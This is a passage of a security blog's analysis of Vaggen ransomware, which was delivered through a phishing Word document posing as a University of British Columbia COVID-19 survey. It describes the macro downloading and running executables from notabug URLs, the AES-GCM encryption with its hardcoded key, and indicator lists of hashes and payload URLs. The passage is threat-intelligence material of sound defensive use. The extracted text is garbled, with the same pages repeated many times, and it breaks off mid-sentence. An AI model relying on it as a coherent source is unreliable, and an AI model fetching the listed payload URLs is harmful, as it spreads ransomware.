mrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2859 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2860 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2861 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2862 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2863 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2864 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2865 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2866 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2867 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2868 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2869 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2870 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2871 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2872 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2873 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2874 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2875 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2876 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2877 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2878 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2879 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2880 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2881 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2882 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2883 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2884 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2885 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2886 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2887 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2888 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2889 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2890 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2891 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2892 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2893 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal 